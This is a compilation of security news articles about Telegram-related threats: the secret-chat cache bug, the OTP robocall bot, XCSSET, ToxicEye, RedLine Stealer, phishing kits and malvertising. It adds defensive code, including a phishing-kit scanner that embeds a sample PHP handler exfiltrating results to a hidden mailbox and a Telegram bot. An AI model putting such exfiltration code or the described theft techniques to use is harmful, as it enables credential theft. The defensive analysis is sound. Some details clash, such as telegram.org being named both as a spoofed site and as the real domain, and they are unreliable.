Telegram Bug in Mac Allows User To Save Secret Chats

Cybersecurity experts have found a technique that lets Telegram users on Mac keep self-destructing messages, or view them, without the sender's knowledge. Telegram has an optional "secret chat" feature that protects the privacy of a conversation with additional safeguards: when you start a secret chat with another Telegram user, the chat is end-to-end encrypted, and all messages, media and attachments are set to self-destruct by default, disappearing from the device after some time.

But a new bug found by cybersecurity expert Reegun Richard Jayapaul, Lead Threat Architect at Trustwave SpiderLabs, lets a Telegram user on Mac save self-destructing messages and media permanently. Files sent in a chat other than media are saved in the cache folder under XXXXXX unique numbers tied to a user profile. "As voice recordings, video messages, images, or location sharing images are automatically downloaded to the cache, Reegun discovered that a user could simply copy the media from the cache folder before viewing it in the program," reports BleepingComputer.

Telegram does not download these attachments automatically, because such documents are generally large; they are fetched only when the recipient downloads them. When a user views the content or reads a message, the self-destruct timer starts, and the chat soon disappears and the content is automatically deleted. However, the experts found that the self-destructing media was not removed from the cache folder, so the user could save it to a different location on the hard drive. Telegram patched the vulnerability in macOS version 7.7 (215786) or later after it was reported; however, a different bug still allows a user to save self-destructing media.

According to the reports, Telegram told the experts that this issue can't be fixed, because there is no way to stop the second bug from gaining direct access to the app folder. Telegram said: "please note that the primary purpose of the self-destruct timer is to serve as a simple way to auto-delete individual messages. However, there are some ways to work around it that are outside what the Telegram app can control (like copying the app's folder), and we clearly warn users about such circumstances."

New Robocall Bot on Telegram can Trick Targets Into Giving Up Their Password

Researchers at CyberNews have identified a new form of automated social engineering tool that can harvest one-time passwords (OTPs) from users in the United States, the United Kingdom, and Canada. 

Without any direct contact with the victim, the so-called OTP Bot can trick victims into handing criminals the credentials to their bank accounts, email and other online services. For a potential victim, listening to someone try to scam them blind by exploiting their good faith is exhausting.

A new type of bot-for-hire is conquering the field of social engineering: OTP Bot, the latest malicious Telegram bot, uses robocalls to trick unsuspecting victims into handing over their one-time passwords, which fraudsters then use to log in and empty their bank accounts. Even worse, the newfangled bot's user base has exploded in recent weeks, with tens of thousands of people signing up.

How Does OTP Bot Work?

OTP Bot is the latest example of the emerging Crimeware-as-a-Service model, where cybercriminals rent out destructive tools and services to anybody ready to pay, according to CyberNews expert Martynas Vareikis. After being purchased, OTP Bot enables the users to collect one-time passwords from innocent people by simply typing the target's phone number, as well as any extra information obtained via data leaks or the black market, into the bot's Telegram chat window. 

“Depending on the service the threat actor wishes to exploit, this additional information could include as little as the victim’s email address,” says Vareikis. The bot is being marketed on a Telegram chat channel with over 6,000 users, allowing its owners to make a lot of money by selling monthly memberships to cybercriminals. Meanwhile, its users brag about their five-figure profits from robbing their targets' bank accounts. 

Bot-for-hire services, according to Jason Kent, a hacker in residence at Cequence Security, have already commoditized the automated threat industry, making it very easy for criminals to enter into social engineering. 

Kent told CyberNews: "At one time, a threat actor would need to know where to find bot resources, how to cobble them together with scripts, IP addresses, and credentials. Now, a few web searches will uncover full Bot-as-a-Service offerings where I need only pay a fee to use a bot. It's a Bots-for-anyone landscape now and for security teams."

Gift cards make the scam go-round: 

Card linking is the most common scam tactic used by OTP Bot subscribers. It involves linking a victim's credit card to the scammer's mobile payment app account and then using it to buy gift cards in physical stores.

“Credit card linking is a favorite among scammers because stolen phone numbers and credit card information are relatively easy to come by on the black market,” reckons Vareikis. 

“With that data in hand, a threat actor can choose an available social engineering script from the chat menu and simply feed the victim’s information to OTP Bot.” 

The bot then calls the victim's number using a fake caller ID, posing as a support representative, and tries to trick them into giving up the one-time password needed to log in to their Apple Pay or Google Pay account. After logging in with the stolen one-time password, the threat actor can link the victim's credit card to the payment app and go on a gift card buying spree in a nearby physical store.

Scammers use linked credit cards to buy prepaid gift cards for one simple reason: they leave no financial footprint. This is particularly useful during a pandemic, when mask regulations are in effect in almost all indoor areas, making it considerably easier for criminals to conceal their identity throughout the process.

Since its release on Telegram in April, the service looks to be gaining a lot of momentum, especially in the last few weeks. The OTP Bot Telegram channel currently has 6,098 members, a massive 20 percent growth in just seven days. 

The ease of use and the bot-for-hire model, which let unskilled or even first-time fraudsters rob their victims with minimal effort and zero social contact, appear to be among the reasons for the fast rise. In fact, some OTP Bot users openly broadcast their success stories in the Telegram chat, flaunting their ill-gotten gains to other members of the channel.

Based on the popularity of OTP Bot, it's apparent that this new sort of automated social engineering tool will only gain more popularity. Indeed, it'll only be a matter of time until a slew of new knockoff services hit the market, attracting even more fraudsters looking to make a fast buck off unsuspecting victims. 

The creator of Spyic, Katherine Brown, warns that as more bots enter the market, the opportunities for social engineering and abuse will grow exponentially. “This year we’ve already seen bots emerge that automate attacks against political targets to drive public opinion,” says Brown. 

The growth of social engineering bots-for-hire is even more alarming, according to Dr. Alexios Mylonas, senior cybersecurity lecturer at the University of Hertfordshire, since the pandemic has put greater limitations on our social connections. 

"This is particularly true for those who are not security-savvy. Threat actors are known to use automation and online social engineering attacks, which enables them to optimize their operations, to achieve their goals and the CyberNews team has uncovered yet another instance of it," Mylonas told CyberNews.

How to Recognize Social Engineering Scams?

Keeping all of this in mind, understanding how to detect a social engineering attempt is still critical for protecting money and personal information. Here's how to do it: 

1. Do not answer calls from unknown numbers.

2. Never give out personal information: names, usernames, email addresses, passwords, PINs and anything else that could be used to identify you.

3. Don't fall into the urgency trap: scammers frequently create a false sense of urgency to get targets to hand over their personal information. If someone is pressuring you to make a decision, hang up or say you will call back later, then dial the toll-free number of the firm they claim to represent.

4. Don't trust caller ID: by spoofing names and phone numbers, scammers can impersonate a firm or someone from your contact list.

Financial service companies, on the other hand, never call their clients to verify personal information. If they detect suspicious activity, they simply block the account and expect the customer to contact the firm through official channels to resolve the problem. So stay vigilant, even if the caller ID on your phone screen appears legitimate.

XCSSET, a macOS malware, Targets Google Chrome and Telegram Software

As part of further "refinements in its tactics," a malware notorious for targeting the macOS operating system has been updated to add more elements to its toolset that allow it to accumulate and exfiltrate sensitive data saved in a range of programmes, including apps like Google Chrome and Telegram. This macOS malware can collect login credentials from a variety of apps, allowing its operators to steal accounts. 

XCSSET was discovered in August 2020, when it was found to be targeting Mac developers using an unusual method of propagation that entailed injecting a malicious payload into Xcode IDE projects, which is executed when the project files are built in Xcode. XCSSET collects files containing sensitive information from infected computers and delivers them to the command and control (C2) server. 

Telegram, an instant messaging service, is one of the apps targeted. The malware's "telegram.applescript" packs the "keepcoder.Telegram" folder from the Group Containers directory into an archive. With a copy of that Telegram folder, the attackers can log into the messaging app as the account's legitimate owner: moving the stolen folder to another machine with Telegram installed gives them access to the victim's account, according to Trend Micro researchers. Because normal users have read and write permissions to the application sandbox directory, XCSSET can steal this sensitive data while running as the ordinary user.

The malware can read and dump Safari cookies, inject malicious JavaScript code into multiple websites, steal information from programmes like Notes, WeChat, Skype and Telegram, and encrypt user files, among other things. Earlier this month, XCSSET received an update that lets its developers target macOS 11 Big Sur as well as Macs with the M1 chip by getting around Apple's new security measures in the current operating system.

"The malware downloads its own open tool from its C2 server that comes pre-signed with an ad-hoc signature, whereas if it were on macOS versions 10.15 and lower, it would still use the system's built-in open command to run the apps," Trend Micro researchers previously noted. 

According to a new report released by the cybersecurity firm on Thursday, XCSSET uses a malicious AppleScript file to compress the Telegram data folder ("/Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram") into a ZIP archive before uploading it to a remote server under the attacker's control, allowing the threat actor to log in using the victim's account.

"The discovery of how it can steal information from various apps highlights the degree to which the malware aggressively attempts to steal various kinds of information from affected systems," the researchers said.

Telegram's Pavel Durov says he has known since 2018 about the potential surveillance of his phone

The billionaire said he had known since 2018 that one of his phone numbers was on the NSO Group list, but was not worried about it.

"Since 2011, when I was still living in Russia, I used to think that all my phones were hacked. Anyone who gets access to my personal data will be extremely disappointed, as he will have to view thousands of Telegram feature concepts and millions of messages related to the development process of our product. He will not find any important information there," Durov explained.

At the same time, he recalled that surveillance tools were also used against "much more significant" people, including more than 10 heads of state. "A huge problem for humanity", according to the businessman, is created by "backdoors" that smartphone and software manufacturers deliberately leave in their systems.

"According to Snowden's 2013 revelations, Apple and Google are part of a global surveillance program. These companies should introduce backdoors into their mobile operating systems. These backdoors, usually disguised as security bugs, allow US intelligence agencies to access information on any smartphone in the world," Durov wrote. 

According to Durov, at the same time, access to these vulnerabilities can be obtained not only by the US authorities but also "any other organization that finds them."

"It is not surprising that this is exactly what happened: the Israeli company NSO Group sold access to spy tools that allowed third parties to hack tens of thousands of phones," the billionaire noted.

Recently, The Guardian reported that the Telegram founder's British mobile number was on a list of potential surveillance targets in 2018.

The publication suggested that the authorities of the United Arab Emirates could have shown interest in Durov since the appearance of the entrepreneur's number on the list coincided with his move to this country.

Telegram's Encryption Protocol Detected with Vulnerabilities

An international team of computer scientists said on Friday that its researchers had found four cryptographic vulnerabilities in the popular encrypted chat app Telegram.

According to the security study, the vulnerabilities range from technically trivial and easy to exploit to advanced and of mainly theoretical interest. Ultimately, as ETH Professor Kenny Paterson, a member of the team that exposed the vulnerabilities, demonstrated, all four aspects could have been done better, more securely and more efficiently using a standard approach to cryptography.

Telegram is a free, cloud-based, open-source, cross-platform instant messaging app. It also provides end-to-end encrypted video calling, VoIP, file sharing and various other functions. It was launched in August 2013 for iOS and in October 2013 for Android.

The most significant vulnerability the researchers found is one they call "crime pizza": an attacker could easily reorder the sequence of messages sent from a client to a Telegram-operated cloud server.

“For example, if the order of the messages in the sequence ‘I say “yes” to’, ‘pizza’, ‘I say “no” to’, “crime” was altered then it would appear that the client is declaring their willingness to commit a crime,” according to the universities.
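To show why message reordering matters and what a standard design does about it, here is an added illustration constructed for this page (not MTProto and not the researchers' code): a MAC that covers only the message body accepts the swapped pizza/crime sequence, while a MAC that also covers a strictly increasing sequence number rejects it, whether the records are merely swapped or also renumbered by the attacker.

```python
import hashlib
import hmac
from typing import List, Tuple

# Constructed demo key; a real protocol derives per-session keys.
DEMO_KEY = b"constructed-demo-key-not-a-real-secret"

# A record on the wire: (sequence number, message, authentication tag).
Record = Tuple[int, bytes, bytes]


def tag_message_only(key: bytes, msg: bytes) -> bytes:
    """Weak design: the tag covers only the message body."""
    return hmac.new(key, msg, hashlib.sha256).digest()


def tag_with_sequence(key: bytes, seq: int, msg: bytes) -> bytes:
    """Standard design: the tag also covers the sequence number, so the
    position of the message in the stream is authenticated."""
    return hmac.new(key, seq.to_bytes(8, "big") + msg, hashlib.sha256).digest()


def send(key: bytes, messages: List[bytes], bind_sequence: bool) -> List[Record]:
    """Client side: number the messages and tag each one."""
    records: List[Record] = []
    for seq, msg in enumerate(messages):
        tag = tag_with_sequence(key, seq, msg) if bind_sequence else tag_message_only(key, msg)
        records.append((seq, msg, tag))
    return records


def receive_message_only(key: bytes, records: List[Record]) -> List[bytes]:
    """Server side, weak: each tag is verified in isolation; order is never checked."""
    accepted = []
    for _seq, msg, tag in records:
        if not hmac.compare_digest(tag, tag_message_only(key, msg)):
            raise ValueError("bad tag")
        accepted.append(msg)
    return accepted


def receive_with_sequence(key: bytes, records: List[Record]) -> List[bytes]:
    """Server side, fixed: the counter must be consecutive and the tag must
    verify under that counter, so neither swapping nor renumbering passes."""
    accepted = []
    expected = 0
    for seq, msg, tag in records:
        if seq != expected:
            raise ValueError(f"out-of-order record: got {seq}, expected {expected}")
        if not hmac.compare_digest(tag, tag_with_sequence(key, seq, msg)):
            raise ValueError(f"bad tag on record {seq}")
        accepted.append(msg)
        expected += 1
    return accepted


def reorder_in_transit(records: List[Record]) -> List[Record]:
    """Attacker model from the text: swap the 2nd and 4th records in transit.
    Nothing is decrypted or forged; only the order changes."""
    swapped = list(records)
    swapped[1], swapped[3] = swapped[3], swapped[1]
    return swapped


def renumber(records: List[Record]) -> List[Record]:
    """Attacker additionally rewrites the sequence fields to look consecutive."""
    return [(i, msg, tag) for i, (_seq, msg, tag) in enumerate(records)]


def demo() -> dict:
    """Run the pizza/crime exchange through both receivers and report the outcome."""
    msgs = [b'I say "yes" to', b"pizza", b'I say "no" to', b"crime"]
    weak = reorder_in_transit(send(DEMO_KEY, msgs, bind_sequence=False))
    strong = reorder_in_transit(send(DEMO_KEY, msgs, bind_sequence=True))
    result = {"weak_accepts": receive_message_only(DEMO_KEY, weak)}
    for name, recs in (("reordered", strong), ("renumbered", renumber(strong))):
        try:
            receive_with_sequence(DEMO_KEY, recs)
            result[name] = "accepted"
        except ValueError as err:
            result[name] = str(err)
    return result


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```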

Using one of the more theoretical vulnerabilities, an attacker could determine which of two messages the client had encrypted, although particular circumstances are required to do so.

Rather than using a more common protocol such as Transport Layer Security, Telegram uses its own MTProto encryption protocol, which cryptographers have eyed skeptically in the past as well. The new investigation is a reminder that while encrypted apps give considerable protection, they are not 100% impervious.

The flaws in Telegram were reported by cryptographers from ETH Zürich, a public research university in Switzerland, and Royal Holloway, a constituent college of the University of London.

“For most users, the immediate risk is low, but these vulnerabilities highlight that Telegram fell short of the cryptographic guarantees enjoyed by other widely deployed cryptographic protocols,” a university summary states. 

Telegram wrote that it made changes in response to the disclosure “that make the four observations made by the researchers no longer relevant.” 

It also stated that none of the findings were critical vulnerabilities.

“We welcome any research that helps make our protocol even more secure,” Telegram said. “These particular findings helped further improve the theoretical security of the protocol.”

Toxic Eye Malware is Utilizing Telegram

In 2021, many users left WhatsApp for other messaging applications that promised better data protection, after the company announced that it would share user metadata with Facebook by default. Many of those users turned to Telegram and Signal, WhatsApp's main competitors.

According to Sensor Tower, Telegram was the most installed application in January 2021, with over 63 million downloads. Telegram chats are still not end-to-end encrypted by default, as Signal chats are, and now Telegram has another issue: malware.

Check Point Software's research team recently found that cybercriminals are using Telegram as the communications platform for a malware program named Toxic Eye. It turns out that certain features of Telegram are far more convenient for attackers than web-based tools; today they have handy Telegram bots to control compromised machines.

Toxic Eye is a kind of malware known as a remote access trojan (RAT). A RAT gives an intruder remote control over an infected machine, meaning the attacker can steal data from the host, destroy or copy files, disrupt the machine's operation and much more. The Toxic Eye RAT is distributed by e-mail with an attached EXE file; if the target opens the file, the malware is installed on the user's computer.

RATs are comparable to legitimate remote access programs, such as those used by technical support to control a user's device. The difference is that RATs sneak in without authorization, imitating or hiding within legitimate files: sometimes disguised as a document, sometimes embedded in a larger file such as a video game.

Attackers used Telegram to remotely control the malware. Check Point analyst Omer Hofman says that between February and April 2021 the company found 130 Toxic Eye attacks using this tool, and several properties make Telegram valuable to bad actors who distribute malware.

Firewalls do not block Telegram, and neither do network control tools. It is a user-friendly app that most people recognize as legitimate, so they let their guard down.

The researchers' advice is not to open email attachments from unknown senders. Also watch out for attachments whose names contain usernames; malicious emails often put the username or the attachment's name in the subject line. A message is possibly malicious if the sender tries to sound urgent, threatening or compelling, pushing the recipient to click a link or attachment or to provide sensitive data. Where possible, use anti-phishing tools.

RedLine Stealer: Masquerades as Telegram Installer

The .Net-based malware has recently been disguised as an installer of the popular secure messaging app, Telegram. 

Stealers are pieces of malicious code written with a hit-and-run mindset: they aim to find something of value on an infected computer and send it back to their operator. These sinister viruses usually arrive as a second-stage payload or by masquerading as legitimate apps. One such stealer is RedLine Stealer, which attackers often use to steal credentials from unsuspecting users.

According to Minerva, RedLine Stealer employs evasion techniques to bypass security products, beginning with the unpacking process. Like most .Net malware, the fake setup file is packed and highly obfuscated. Detect-It-Easy recognizes no known packer, implying that unpacking must be performed manually.

After decompiling the malware, most variable and function names turned out to be scrambled, making the code difficult to follow. The packer's developer also implemented control flow flattening in the packer to make any reverse engineering effort truly miserable: control flow flattening takes the program's normal control flow and rewrites it as numerous if/while statements.

Packers typically use steganography or encryption in their arsenal. Here, what appear to be malformed image files in the resources directory are actually the malicious payload, decoded and decrypted by a custom algorithm.

The payload data is concealed inside the RGB values of image pixels. The first pixel contains the size of the meaningful data inside the image, while the others include the actual data. 

After decoding the image, the packer decrypts the payload with the RC2 cipher, revealing a file called "Lightning.dll", which it loads into memory. An object named "GameCore.Core" is instantiated from the in-memory DLL, and inside it a function named "Game" receives yet another image file from the binary's resources directory, along with a hardcoded key.

The "Game" function decrypts the final payload and then uses process injection to load the malware into another process's memory space. The final payload is not obfuscated at all, which made it possible to read its C&C address in cleartext, Minerva reported.
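The pixel-encoded payload layout described above (size in the first pixel, data in the following RGB values), worked as an added analyst-side example that is not Minerva's or the malware's own code: `pack_payload` only builds a constructed test carrier, `unpack_payload` recovers the declared bytes and rejects a size the image cannot hold, and `triage_carrier` uses byte entropy to judge whether the extracted blob looks encrypted (the RC2 stage) before any decryption effort is spent. The 24-bit big-endian size field and the three-bytes-per-pixel packing are assumptions; the post specifies neither.

```python
import math
from collections import Counter
from typing import Iterable, List, Tuple

Pixel = Tuple[int, int, int]


def pack_payload(data: bytes) -> List[Pixel]:
    """Constructed fixture only: lay `data` out the way the post describes,
    pixel 0 holding the payload size and each following pixel holding three
    payload bytes (R, G, B). The size encoding is an assumption (24-bit,
    big-endian across R, G, B)."""
    if len(data) > 0xFFFFFF:
        raise ValueError("payload too large for a 24-bit size field")
    n = len(data)
    pixels: List[Pixel] = [((n >> 16) & 0xFF, (n >> 8) & 0xFF, n & 0xFF)]
    padded = data + b"\x00" * (-len(data) % 3)  # pad to a whole pixel
    for i in range(0, len(padded), 3):
        pixels.append((padded[i], padded[i + 1], padded[i + 2]))
    return pixels


def unpack_payload(pixels: Iterable[Pixel]) -> bytes:
    """Analyst-side extraction: read the size from pixel 0, then collect the
    RGB bytes of the following pixels and truncate to the declared size.
    A declared size larger than the image can hold marks a malformed carrier."""
    px = list(pixels)
    if not px:
        raise ValueError("empty pixel list")
    r, g, b = px[0][:3]  # [:3] drops an alpha channel if the image has one
    size = (r << 16) | (g << 8) | b
    available = 3 * (len(px) - 1)
    if size > available:
        raise ValueError(f"declared size {size} exceeds {available} embedded bytes")
    out = bytearray()
    for p in px[1:]:
        out.extend(p[:3])
        if len(out) >= size:
            break
    return bytes(out[:size])


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted or compressed data sits close to 8.0,
    while text or ordinary image content sits well below."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def triage_carrier(pixels: Iterable[Pixel]) -> dict:
    """What an analyst wants before touching the custom decryption stage:
    how much data is declared and whether it looks encrypted."""
    blob = unpack_payload(pixels)
    entropy = shannon_entropy(blob)
    return {"size": len(blob), "entropy": round(entropy, 2),
            "looks_encrypted": entropy > 7.5}


if __name__ == "__main__":
    # Constructed stand-in for an RC2-encrypted DLL: every byte value equally likely.
    sample = bytes(range(256)) * 12
    print(triage_carrier(pack_payload(sample)))
```

For a real sample, pass `list(Image.open(path).convert("RGB").getdata())` from Pillow; the extraction logic is unchanged.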

ToxicEye: Trojan Abuses Telegram to Steal Data

The operators of a new Remote Access Trojan (RAT) are exploiting the Telegram service to keep control of their malware. ToxicEye is malware that uses Telegram as part of its command-and-control (C2) infrastructure to steal data.

In a blog post published on Thursday, Check Point Research's Omer Hofman stated that the latest remote malware has been seen in the wild, with over 130 attacks reported in the last three months.

Telegram is a communication platform and instant messaging service that has recently seen a boost in popularity as a result of the recent controversy surrounding WhatsApp's data-sharing policies with Facebook. The platform, which has over 500 million monthly active users, has also proven popular among cybercriminals who use it to distribute and execute malicious software. 

ToxicEye operators start the attack chain by creating a Telegram account and a bot. Bots are used for several tasks, such as reminders, searches, issuing orders, and launching surveys. In this case, however, the malware's configuration includes a bot for malicious purposes. 

According to researchers, "Any victim infected with this malicious payload can be attacked via the Telegram bot, which connects the user's device back to the attacker's C2 via Telegram." 

Phishing emails with malicious document attachments are sent to the intended victims. ToxicEye is launched if the victim allows the resulting malicious .exe file to be downloaded. The ToxicEye RAT has a variety of features, including the ability to search for and steal credentials, OS data, browser history, clipboard content and cookies, as well as to transfer and delete files, kill processes and hijack the task manager.

Furthermore, the malware can install keyloggers and gain access to microphones and camera peripherals to capture audio and video. The researchers discovered ransomware characteristics such as the ability to encrypt and decrypt victim data. 

Users who suspect an infection should check for "C:\Users\ToxicEye\rat.exe". This applies to both personal and business machines, and if the file is found it should be deleted immediately.

Researchers stated, "Given that Telegram can be used to distribute malicious files, or as a C2 channel for remotely controlled malware, we fully expect that additional tools that exploit this platform will continue to be developed in the future.”

Threat Actors are Using Telegram & Google Forms to Obtain Stolen User Data

Security researchers have noted an increase in the misuse of legitimate services such as Google Forms and Telegram for collecting user data stolen on phishing websites. Email remains the most popular method among threat actors for exfiltrating stolen data, but these alternatives foreshadow a new trend in the evolution of phishing kits.

After analyzing the phishing kits over the past year, researchers at cybersecurity company Group-IB observed that more of these tools permit collecting users' stolen data using Google Forms and Telegram. 

What is a phishing kit? 

A phishing kit is a toolset that helps design and run phishing web pages mimicking a particular brand or firm or even several at once. Phishing kits are often sold to those hackers who do not have exceptional coding skills. These phishing kits allow them to design an infrastructure for large-scale phishing campaigns.

By extracting the phishing kit, security researchers can examine the methodology used to carry out the phishing attack and figure out where the stolen data is sent. Besides, a thorough examination of the phishing kit helps researchers in detecting digital footprints that might lead to the developers of the phishing kit.

Latest trends of 2020 

Security researchers at Group-IB identified more than 260 unique brands on cybercriminals' target lists, most of them online services (30.7%: online document viewers, online shopping, streaming services and more), email clients (22.8%) and financial organizations (20%). The most exploited brands of 2020 were Microsoft, PayPal, Google and Yahoo.

Another trend the researchers noticed was that phishing kit developers were double-dipping to increase their profits, adding code that copies the stream of stolen data to their own network host. The researchers explained that one method is to configure the 'send' function to deliver the information both to the email address provided by the buyer of the phishing kit and to a 'token' variable linked to a concealed email address.
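One way a defender can triage a captured kit for the exfiltration channels described above (email, the Telegram bot API, Google Forms) and for the concealed second recipient, as an added example that is not Group-IB's tooling; `KIT_SAMPLE` is a constructed fragment with placeholder values, not a real kit:

```python
import base64
import binascii
import re
from typing import Dict, List

# Constructed fragment in the style of a phishing kit's result handler.
# Not a real kit: placeholders stand in for tokens, IDs and addresses.
KIT_SAMPLE = r'''
<?php
$recipient = "buyer@example.com";                  // address set by the kit's buyer
$token = base64_decode("ZGV2QGV4YW1wbGUubmV0");    // concealed copy for the kit author
$tg = "https://api.telegram.org/botPLACEHOLDER_TOKEN/sendMessage?chat_id=PLACEHOLDER_ID";
$gf = "https://docs.google.com/forms/d/e/PLACEHOLDER_FORM_ID/formResponse";
mail($recipient, "Result", $body);
mail($token, "Result", $body);
'''

# Each pattern has exactly one capture group, so findall() returns plain strings.
PATTERNS = {
    "telegram_bot_api": re.compile(r'(https?://api\.telegram\.org/bot[^/"\' ]+/\w+)'),
    "google_forms": re.compile(r'(https?://docs\.google\.com/forms/[^"\' ]*formResponse)'),
    "mail_recipients": re.compile(r'\bmail\s*\(\s*(\$\w+|"[^"]+")'),
    "base64_literals": re.compile(r'base64_decode\s*\(\s*"([A-Za-z0-9+/=]+)"'),
}


def scan_kit(source: str) -> Dict[str, List[str]]:
    """Collect exfiltration indicators from phishing-kit source text."""
    findings = {name: rx.findall(source) for name, rx in PATTERNS.items()}
    # Kit authors hide their own address behind base64; decode what we can.
    decoded = []
    for literal in findings["base64_literals"]:
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # not valid base64, leave it for manual review
    findings["decoded_literals"] = decoded
    return findings


def is_double_dipping(findings: Dict[str, List[str]]) -> bool:
    """Flag kits that mail the same stolen data to more than one recipient
    expression: the 'buyer address plus hidden token' pattern."""
    return len(set(findings["mail_recipients"])) > 1


if __name__ == "__main__":
    found = scan_kit(KIT_SAMPLE)
    for name, hits in found.items():
        print(f"{name}: {hits}")
    print("double dipping:", is_double_dipping(found))
```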

"Phishing kits have changed the rules of the game in this segment of the fight against cybercrime. In the past, cybercriminals stopped their campaigns after the fraudulent resources had been blocked and quickly switched to other brands. Today, they automate their attacks and instantly replace the blocked phishing websites with new web pages," Yaroslav Kargalev, Deputy Head at CIRT-GIB, stated.

Malware Campaign Targets Telegram Desktop Application

On Sunday, Jannis Kirschner, an independent security researcher based in Basel, Switzerland, searched the internet for the well-known Telegram desktop client. The second Google result was an advertisement that led him directly to malware disguised as the Telegram for Windows desktop client. At first sight it was convincing enough that Kirschner says he "almost fell for it myself."

Malware distributors routinely use the same advertising tools that legitimate online businesses use to attract people. Google polices its advertising ecosystem to stop such abuse, but malvertising remains an ongoing problem. Although visiting telegramdesktop[dot]com now triggers an alert from the Google Safe Browsing service, two other sites that duplicated it were unsafe and potentially still active: telegraph[dot]net and telegram[dot]org. Kirschner reported the websites to Google.

All three spoofed websites are clones of Telegram's site. Every link on the cloned sites redirects to the legitimate Telegram domain, design.telegram.com, except one: the link that is supposed to download the Telegram Desktop executable for Windows.

"A repo probably was a bad choice for delivering malware since it's very verbose (download numbers, time, and other documents)," Kirschner says. "The biggest opsec mistake was that they didn't clean one of the repo's metadata, which led me to discover commit messages and their e-mail [address]."

He further adds that "I believe that it is the same threat actor or group since the TTPs [tactics, techniques, and procedures] are the same, and all sites have been established in a very close timeframe using the same hoster and certificate authority." 

Hosting malware on platforms such as Bitbucket offers at least a temporary benefit: links to such platforms are often deemed genuine, and the malicious repository stays up until someone reports it and it is removed. These platforms combine technical filtering with manual review, but the measures don't always work properly, says Kirschner.

A February 2020 report by the security firm Cybereason described over half a dozen newcomers, including crypto miners, ransomware and other malware, that bad actors had placed on Bitbucket.

The telegramdesktop[dot]com website appears to be hosted in Moldova. Kirschner says the domain was registered on 29 December 2020. A search of the Internet Archive's Wayback Machine reveals that telegramdesktop[dot]com redirected to the rightful domain telegram.org in April 2018. However, according to DomainTools records, the domain expired in October 2018.

"I assume that domain once belonged to Telegram themselves, expired and was taken over by the criminals now," Kirschner further says.

Sift Exposes New Telegram Fraud Scheme to Exploit Restaurants and Food Delivery Apps

As the popularity of food delivery apps increases with each passing day, so does their revenue, and as a consequence these apps are on scammers' hit list. Sift, a US-based digital trust and safety firm, says it has spotted a fraud scheme in which scammers use the chat app Telegram to steal from restaurants and food delivery apps.

Sift’s Digital Trust and Safety experts discovered that threat actors are promoting their services on Telegram forums to buy food and beverage orders at steep discounts, using stolen payment information on behalf of clients.

The methodology used by fraudsters

Professional scammers advertise in Telegram forums, such as ‘Fraud Market’ that they can illicitly buy food and beverage orders at a steep discount, typically 60-75% off. Diners who are tempted to take advantage of this offer direct-message the scammers along with a screenshot of their food app shopping cart and their delivery address to place the order.

The scammer accepts the order, and the diner pays the scammer in cryptocurrency such as Bitcoin or Ethereum, or via PayPal, Venmo or Cash App. The scammer then covers the full cost of the order using a new account, stolen credit card information or a hacked account.

Brittany Allen, trust and safety architect at Sift explained that “the Dark Web can be difficult to access and with frequent marketplace shutdowns by law enforcement, bad actors are looking for new places to commit a crime. End-to-end encrypted messaging platforms like Telegram are attractive options as they are more accessible and it is easier to go undetected when committing low-level fraud.”

Sift experts disclosed that from the third quarter to the fourth quarter of 2020 there was a 14% increase in payment scams targeting restaurants and food delivery apps. This is not the first scheme exploiting restaurants and food delivery services that Sift experts have uncovered.

Cybercriminals Try to Hack Popular Russian Telegram Channels Using Fake GeekBrains Ads

The owners of the Telegram channels noted that scammers send malicious files under the guise of advertising offers.

"In particular, they can pose as advertising managers of the GeekBrains educational platform", Nikita Mogutin, co-founder of the Telegram channel Baza (more than 310,000 subscribers), wrote on Facebook. Madonna Moore, owner of the Telegram channel Madonna (more than 9,500 subscribers), said that five scammers write to her every day. She also published the text of her correspondence with a person who introduced himself as a representative of GeekBrains.

GeekBrains has received many complaints about fraud on behalf of the company and has already sent out warnings to agencies and bloggers, said Elena Toropina, head of the company's marketing department. In her opinion, the attack on the channels is connected with the growth of the online education industry, which spends a lot of money on advertising.

Kaspersky Lab reported that the attachments sent by the attackers contain a Trojan virus. 

"If the victim runs the file, a program will be installed on the computer that will steal the accounts stored on it and give the fraudsters hidden remote control of the Telegram channel", said Yaroslav Kargalev, deputy head of the Group-IB incident response center. According to him, scammers can also change the phone number in the channel's account to get full control over it.

Most often, a channel is stolen in order to publish links to malicious resources in it or to demand a ransom, said Sergey Trukhachev, head of the special services unit at Infosecurity, a Softline company.

"The increase in the activity of scammers may be associated with the influx of new users to Telegram", noted Kargalev.

Telegram downloads have increased dramatically since WhatsApp added a clause to its terms concerning the sharing of users' personal data with Facebook. Moreover, Telegram's growing popularity is also due to supporters of Donald Trump, who was blocked on many social networks, having "flowed" there.

Telegram founder Pavel Durov called the sharp increase in the number of new users "the largest digital migration" in human history. In the first week of January, Telegram's monthly audience passed the mark of 500 million active users.

Earlier, E Hacking News reported that Pavel Durov advised users to remove WhatsApp from smartphones. He called the WhatsApp application unsafe.


WhatsApp Users Turn to Other Messaging Platforms

WhatsApp has told its two billion users that they must allow it to share data with its parent company Facebook if they wish to keep using the service. Users will not be able to continue using WhatsApp unless they accept the new terms by 8 February. The platform said the update will enable it to offer features such as shopping and payments.

Messaging platforms Signal and Telegram have both seen a huge surge in downloads around the world after a controversial update to WhatsApp's terms and conditions.

According to data from analytics firm Sensor Tower, Signal was downloaded many times worldwide in the week before WhatsApp announced the change on 4 January and 8.8 million times in the week after. This included big surges in India, where downloads went from 12,000 to 2.7 million, in the UK from 7,400 to 191,000, and in the US from 63,000 to 1.1 million. In a series of tweets, Signal said some people were reporting problems creating groups and delays in verification codes arriving because of the rapid growth, but that it was addressing the issues.

Telegram has proved even more popular, with worldwide downloads booming from 6.5 million for the week starting 28 December to 11 million over the following week. In the UK, downloads went from 47,000 to 101,000, and in the US from 272,000 to 671,000. During the same period, WhatsApp's worldwide downloads shrank from 11.3 million to 9.2 million.

One industry watcher said he did not think this necessarily represented a major problem for WhatsApp, which has been downloaded 5.6 billion times since its launch in 2014.

"It will be hard for opponents to break user habits, and WhatsApp will keep on being one of the world's most popular and broadly utilized messaging platforms," said Craig Chapple, mobile insights strategist at Sensor Tower. 

